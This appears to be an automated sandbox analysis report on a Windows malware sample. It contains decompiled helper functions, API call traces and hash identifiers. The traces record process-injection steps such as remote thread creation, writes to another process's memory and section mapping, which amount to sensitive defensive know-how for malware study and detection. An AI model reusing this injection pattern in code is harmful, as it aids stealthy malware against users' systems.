                                                                                  • Opcode ID: b40dcd106d16c7f11c3538ba2f02d330f9bb7f9aa4932777d5d0cb9fe50f2391
                                                                                  • Instruction ID: 06a883a977e8bbc9192d93dbfad5f2326a784edc87c41a6e59f726d5d96e27c9
                                                                                  • Opcode Fuzzy Hash: b40dcd106d16c7f11c3538ba2f02d330f9bb7f9aa4932777d5d0cb9fe50f2391
                                                                                  • Instruction Fuzzy Hash: 6FF0DA74651246EFE718EB29E8C9F19B768EB44741F844014E9028735CCB34E801DB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E033F46EF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                  				intOrPtr* _v8;
                                                                                  				void* _t17;
                                                                                  				intOrPtr* _t22;
                                                                                  				void* _t27;
                                                                                  				char* _t30;
                                                                                  				void* _t33;
                                                                                  				void* _t34;
                                                                                  				void* _t36;
                                                                                  				void* _t37;
                                                                                  				void* _t39;
                                                                                  				int _t42;
                                                                                  
                                                                                  				_t17 = __eax;
                                                                                  				_t37 = 0;
                                                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                  				_t2 = _t17 + 1; // 0x1
                                                                                  				_t28 = _t2;
                                                                                  				_t34 = E033F75C4(_t2);
                                                                                  				if(_t34 != 0) {
                                                                                  					_t30 = E033F75C4(_t28);
                                                                                  					if(_t30 == 0) {
                                                                                  						E033F4C31(_t34);
                                                                                  					} else {
                                                                                  						_t39 = _a4;
                                                                                  						_t22 = E033FA97B(_t39);
                                                                                  						_v8 = _t22;
                                                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                  							_a4 = _t39;
                                                                                  						} else {
                                                                                  							_t26 = _t22 + 2;
                                                                                  							_a4 = _t22 + 2;
                                                                                  							_t22 = E033FA97B(_t26);
                                                                                  							_v8 = _t22;
                                                                                  						}
                                                                                  						if(_t22 == 0) {
                                                                                  							__imp__(_t34, _a4);
                                                                                  							 *_t30 = 0x2f;
                                                                                  							 *((char*)(_t30 + 1)) = 0;
                                                                                  						} else {
                                                                                  							_t42 = _t22 - _a4;
                                                                                  							memcpy(_t34, _a4, _t42);
                                                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                                                  							__imp__(_t30, _v8);
                                                                                  						}
                                                                                  						 *_a8 = _t34;
                                                                                  						_t37 = 1;
                                                                                  						 *_a12 = _t30;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t37;
                                                                                  			}















                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,033F8390,00000000,00000000,00000000,05F29698,?,?,033F4680,?,05F29698), ref: 033F46FB
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                    • Part of subcall function 033FA97B: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,033F4729,00000000,00000001,00000001,?,?,033F8390,00000000,00000000,00000000,05F29698), ref: 033FA989
                                                                                    • Part of subcall function 033FA97B: StrChrA.SHLWAPI(?,0000003F,?,?,033F8390,00000000,00000000,00000000,05F29698,?,?,033F4680,?,05F29698,0000EA60,?), ref: 033FA993
                                                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,033F8390,00000000,00000000,00000000,05F29698,?,?,033F4680), ref: 033F4759
                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 033F4769
                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 033F4775
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3767559652-0
                                                                                  • Opcode ID: cd792b98d237fdedc56485e406ae87f09513428820f1190f9fea7282c527cc36
                                                                                  • Instruction ID: 3a1038fa8dce47837d0b9d0f18c20cccce1c19209efdb092fbbe7246db9aec48
                                                                                  • Opcode Fuzzy Hash: cd792b98d237fdedc56485e406ae87f09513428820f1190f9fea7282c527cc36
                                                                                  • Instruction Fuzzy Hash: 13218E7A500359AFCB02EF65CCC4EABBFACDF06290F854054FA499B211D634C9058BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F7AC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                  				void* _v8;
                                                                                  				void* _t18;
                                                                                  				int _t25;
                                                                                  				int _t29;
                                                                                  				int _t34;
                                                                                  
                                                                                  				_t29 = lstrlenW(_a4);
                                                                                  				_t25 = lstrlenW(_a8);
                                                                                  				_t18 = E033F75C4(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                  				_v8 = _t18;
                                                                                  				if(_t18 != 0) {
                                                                                  					_t34 = _t29 + _t29;
                                                                                  					memcpy(_t18, _a4, _t34);
                                                                                  					_t10 = _t25 + 2; // 0x2
                                                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}









                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,05F2931C,?,033F4CC5,004F0053,05F2931C,?,?,?,?,?,?,033F3858), ref: 033F7AD8
                                                                                  • lstrlenW.KERNEL32(033F4CC5,?,033F4CC5,004F0053,05F2931C,?,?,?,?,?,?,033F3858), ref: 033F7ADF
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,033F4CC5,004F0053,05F2931C,?,?,?,?,?,?,033F3858), ref: 033F7AFF
                                                                                  • memcpy.NTDLL(73B769A0,033F4CC5,00000002,00000000,004F0053,73B769A0,?,?,033F4CC5,004F0053,05F2931C), ref: 033F7B12
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2411391700-0
                                                                                  • Opcode ID: 99e7187653d89000d86268d043ba39b42046122f97aa6b68801f4a041fd77192
                                                                                  • Instruction ID: 0f36bc2ba591ba516ca1dc5d6a8bf629ce967c83d07daa8c7c98927947664fc6
                                                                                  • Opcode Fuzzy Hash: 99e7187653d89000d86268d043ba39b42046122f97aa6b68801f4a041fd77192
                                                                                  • Instruction Fuzzy Hash: 0CF0F976901118BFCF11EFA9CC84C9F7BACEF092947554062EE08DB201E671EA149BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(05F2887A,00000000,00000000,00000000,033F6CA0,00000000), ref: 033F74BF
                                                                                  • lstrlen.KERNEL32(?), ref: 033F74C7
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • lstrcpy.KERNEL32(00000000,05F2887A), ref: 033F74DB
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 033F74E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 74227042-0
                                                                                  • Opcode ID: 1a2144c5c2ba2633ae05270f84b290008203f076c2ac17fec86c46d4eba84f6b
                                                                                  • Instruction ID: 3659b98962c1a085afbd2f5c328e9c43077dd6df42b4ae6e414cc593250a7b0f
                                                                                  • Opcode Fuzzy Hash: 1a2144c5c2ba2633ae05270f84b290008203f076c2ac17fec86c46d4eba84f6b
                                                                                  • Instruction Fuzzy Hash: 16E012739016656F8711EBE89C88C9FBBACEF897617444816F604D3105C729D809DBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Executed Functions

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000016.00000003.786784933.000001F2CE830000.00000010.00000001.sdmp, Offset: 000001F2CE830000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                  • Instruction ID: 4ec66dcbab085a6c4445b7cb2bbc5cb3c118a3c841eb8a9975bb54f8e896b7ec
                                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                  • Instruction Fuzzy Hash: 10900228495C0B56D41411910C452AD60406388250FD44590841A90198D49D02961152
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID: @
                                                                                  • API String ID: 1279760036-2766056989
                                                                                  • Opcode ID: 2b0b1a7e621844ba672fbd7c975c592666e47f3efc4b878a1f72b40adda0f817
                                                                                  • Instruction ID: 7b5dd80199127317cc68f0fd89367b08975ff3c1f3999e2d4e84ff74719b539f
                                                                                  • Opcode Fuzzy Hash: 2b0b1a7e621844ba672fbd7c975c592666e47f3efc4b878a1f72b40adda0f817
                                                                                  • Instruction Fuzzy Hash: D8128230728E0A8FDB69EF28D884A7673E1FB98715F54462ED44AC3251EF34E951CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseInformationQueryToken
                                                                                  • String ID: 0
                                                                                  • API String ID: 3130709563-4108050209
                                                                                  • Opcode ID: f5895f5cec159cec64883b650c172f0a268582915eacc63c06442516161aa36d
                                                                                  • Instruction ID: 36a97f8c423162cecedd53e23fbbea0f50cb41c001c226de4929bf6e052592c1
                                                                                  • Opcode Fuzzy Hash: f5895f5cec159cec64883b650c172f0a268582915eacc63c06442516161aa36d
                                                                                  • Instruction Fuzzy Hash: 0E31FC30218B488FD764EF69D8C479AB7E5FBD9311F50492EE48EC3250DB349946CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Find$File$First$BoundaryCloseDeleteDescriptorNext
                                                                                  • String ID:
                                                                                  • API String ID: 497501178-0
                                                                                  • Opcode ID: 9dd355484183675adc5958804eb991c86153142d7fdd9a3a4564d5441d048789
                                                                                  • Instruction ID: c824732f9d922f28d81f020ad6eaa492c32994f19450888be511744ca0612ebf
                                                                                  • Opcode Fuzzy Hash: 9dd355484183675adc5958804eb991c86153142d7fdd9a3a4564d5441d048789
                                                                                  • Instruction Fuzzy Hash: 52C11030708B488FDBA4EF29D898BAA77E1FBD8301F54452DE48AC3255DB34E945CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: FileFind$Next$CloseCreateFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1873968597-0
                                                                                  • Opcode ID: ec43f0c3b8a9abdb495af53b823e2bcefce86244cf21586d6a46e467c588e6d7
                                                                                  • Instruction ID: ad5ec91296db5a3b5db986806dcc37fd9ff90e55262f94e392e499ee12f0e9bf
                                                                                  • Opcode Fuzzy Hash: ec43f0c3b8a9abdb495af53b823e2bcefce86244cf21586d6a46e467c588e6d7
                                                                                  • Instruction Fuzzy Hash: 9381D93161CB448FD765EF28D8895E977E1F798301F50892EE48BC3291EE78E94587C2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 5e645ce29076bf0e0e77b478d030f46fabcaf474b1e9f355b1405d54c0c4e1a5
                                                                                  • Instruction ID: e507dcddd7e7c06e3ea88a2963708cd2f9a8971b426dba44b4eae924fa1f267a
                                                                                  • Opcode Fuzzy Hash: 5e645ce29076bf0e0e77b478d030f46fabcaf474b1e9f355b1405d54c0c4e1a5
                                                                                  • Instruction Fuzzy Hash: 2E329430718B548FD769EF28D89566AB7E5FB98700F14492DE08BC3261DF38E551CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: QueryValue$CloseOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1586453840-0
                                                                                  • Opcode ID: c2a4bd50ddac5cd25330f0df8796ec603320bde12fb6a07587cc34d06e9df7b3
                                                                                  • Instruction ID: 7066b0693e201795d6957e43574de2200a8bd7413fea120e21d5dd98380e2543
                                                                                  • Opcode Fuzzy Hash: c2a4bd50ddac5cd25330f0df8796ec603320bde12fb6a07587cc34d06e9df7b3
                                                                                  • Instruction Fuzzy Hash: E7D1963125CA488FDB68EF28D884A69B7E1FB95300F25456DE49FC3261DF34E856CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DA7D44: NtQueryInformationProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 04DA7D8E
                                                                                  • VirtualAlloc.KERNEL32 ref: 04DB28A7
                                                                                  • VirtualFree.KERNELBASE ref: 04DB29C8
                                                                                  • VirtualAlloc.KERNEL32 ref: 04DB29E5
                                                                                  • VirtualFree.KERNELBASE ref: 04DB2A79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree$InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 455085918-0
                                                                                  • Opcode ID: d99f1c45837a0a2278b616fead5eb22d78f03e7e9304eff0ea8f30ecf2eb5f49
                                                                                  • Instruction ID: a96034fcae1deaeeed3856e6f12450502a698c3f9e14d5f2e0f7145a679e2d49
                                                                                  • Opcode Fuzzy Hash: d99f1c45837a0a2278b616fead5eb22d78f03e7e9304eff0ea8f30ecf2eb5f49
                                                                                  • Instruction Fuzzy Hash: 6361E73271CB198FEB699F28A8492BA73D1F795310B15456DE8CFD3241EE20E84287C2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocCreateFreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2341667014-0
                                                                                  • Opcode ID: f400db90b547cd876deae4f918f036170426a129d3192a9b6cb0266f0b9909ab
                                                                                  • Instruction ID: 37d821109863b7621b88598f607d46e24dd1a7cd19ed8a719de290a06332be23
                                                                                  • Opcode Fuzzy Hash: f400db90b547cd876deae4f918f036170426a129d3192a9b6cb0266f0b9909ab
                                                                                  • Instruction Fuzzy Hash: 7791A530618B09CFE758EF28D8457AA77E5FB94304F10452DE98BC3251EF78E8468782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtSetInformationProcess.NTDLL ref: 04DB2CA2
                                                                                  • CreateRemoteThread.KERNEL32 ref: 04DB2D52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateInformationProcessRemoteThread
                                                                                  • String ID:
                                                                                  • API String ID: 3020566308-0
                                                                                  • Opcode ID: 88fe45be16d0b1cc0aca176e81cbde1e558c0c971979f96992a73c50b40fe50a
                                                                                  • Instruction ID: 9e40841bf6b3cc27a75ee5ab14685dfa74b1c39b57276aadef51a688e6dde5e1
                                                                                  • Opcode Fuzzy Hash: 88fe45be16d0b1cc0aca176e81cbde1e558c0c971979f96992a73c50b40fe50a
                                                                                  • Instruction Fuzzy Hash: 6F51A131618B098FDB68EF28D89C6AA77E1FB99301F10456DD98BC3251EE34E8458BC1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateMutexExA.KERNEL32 ref: 04DB595B
                                                                                  • GetShellWindow.USER32 ref: 04DB5CC3
                                                                                    • Part of subcall function 04DBFAD4: CreateThread.KERNEL32 ref: 04DBFB04
                                                                                    • Part of subcall function 04DBFAD4: QueueUserAPC.KERNEL32 ref: 04DBFB1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Create$MutexQueueShellThreadUserWindow
                                                                                  • String ID:
                                                                                  • API String ID: 763106962-0
                                                                                  • Opcode ID: db72f500cb4375137250dc09fd218a16c329592276e667ceebb262ae2802a11d
                                                                                  • Instruction ID: c863d0b1813ef0264c4b4d1d028142bca1ace81a5a9ccdc46014e4668813ef70
                                                                                  • Opcode Fuzzy Hash: db72f500cb4375137250dc09fd218a16c329592276e667ceebb262ae2802a11d
                                                                                  • Instruction Fuzzy Hash: 4F829471618E08CFEB28EF28EC955A977E1F758305B20452ED48BC3261DE38E556CBC6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtCreateSection.NTDLL ref: 04DC208E
                                                                                    • Part of subcall function 04DBEF14: NtMapViewOfSection.NTDLL ref: 04DBEF60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Section$CreateView
                                                                                  • String ID: 0
                                                                                  • API String ID: 1585966358-4108050209
                                                                                  • Opcode ID: bff07a427199abbb54e216f8b5ce246404a06d6e97ef88a9cd07a294772bde48
                                                                                  • Instruction ID: 4317dbc08004b3bb3c2d1a2e1c8b18398c217e3668b3b1939dc7c136449cd743
                                                                                  • Opcode Fuzzy Hash: bff07a427199abbb54e216f8b5ce246404a06d6e97ef88a9cd07a294772bde48
                                                                                  • Instruction Fuzzy Hash: 8161C67061CB098FDB54EF19D8D9AA5B7E1FB98311F10856ED88EC7261DB34E841CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL ref: 04DCF9E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 2167126740-2766056989
                                                                                  • Opcode ID: 4419f098cbed19c14a3831561b5072b94f6620ca33e076ad1f3694b096d49546
                                                                                  • Instruction ID: baacc54ad0e6856bee32773bb27129599d0e9fe01e2c13c3859d9a6498b5b10f
                                                                                  • Opcode Fuzzy Hash: 4419f098cbed19c14a3831561b5072b94f6620ca33e076ad1f3694b096d49546
                                                                                  • Instruction Fuzzy Hash: F4F09070718B089BDB44AFA8D8CC66D76E1F749305F500A6DE24AC7294DB7896488742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtProtectVirtualMemory.NTDLL ref: 04DE1298
                                                                                  • NtProtectVirtualMemory.NTDLL ref: 04DE1327
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1032123240.0000000004DE1000.00000040.00000001.sdmp, Offset: 04DE1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlReAllocateHeap.NTDLL ref: 04DB3544
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DB35D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateChangeCloseFindHeapNotification
                                                                                  • String ID:
                                                                                  • API String ID: 3208096886-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegNotifyChangeKeyValue.KERNEL32 ref: 04DA79B6
                                                                                  • SetWaitableTimer.KERNEL32 ref: 04DA7A63
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCreateNotifyTimerValueWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1746168554-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL ref: 04DB1AC7
                                                                                  • NtQueryInformationProcess.NTDLL ref: 04DB1B11
                                                                                    • Part of subcall function 04DC9584: NtReadVirtualMemory.NTDLL ref: 04DC95A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 886377554-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RtlDeleteBoundaryDescriptor.NTDLL ref: 04DC9CF3
                                                                                    • Part of subcall function 04DB7314: RegQueryValueExA.KERNEL32 ref: 04DB7352
                                                                                    • Part of subcall function 04DB7314: RegCloseKey.KERNEL32 ref: 04DB73BF
                                                                                    • Part of subcall function 04DC5688: CallNamedPipeA.KERNEL32 ref: 04DC577D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: BoundaryCallCloseCreateDeleteDescriptorNamedPipeQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 1167359317-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DCE614: GetTempFileNameA.KERNEL32(?,?,?,?,?,?,000003EE,04DCD3FF), ref: 04DCE68B
                                                                                  • DeleteFileA.KERNEL32 ref: 04DA409E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$DeleteNameTemp
                                                                                  • String ID:
                                                                                  • API String ID: 1648863064-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 04DA7D8E
                                                                                    • Part of subcall function 04DC9584: NtReadVirtualMemory.NTDLL ref: 04DC95A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1498878907-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtQuerySystemInformation.NTDLL ref: 04DA1CCD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationQuerySystem
                                                                                  • String ID:
                                                                                  • API String ID: 3562636166-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL ref: 04DC9B72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: SectionView
                                                                                  • String ID:
                                                                                  • API String ID: 1323581903-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2834387570-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtWriteVirtualMemory.NTDLL ref: 04DCC14F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3527976591-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationPointerWrite
                                                                                  • String ID:
                                                                                  • API String ID: 175865374-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32 ref: 04DA3766
                                                                                  • GetExitCodeProcess.KERNEL32 ref: 04DA3806
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DA3811
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Process$ChangeCloseCodeCreateExitFindNotification
                                                                                  • String ID: h
                                                                                  • API String ID: 2788277846-2439710439
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectThreadVirtual$ResumeSuspend
                                                                                  • String ID:
                                                                                  • API String ID: 3483329683-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
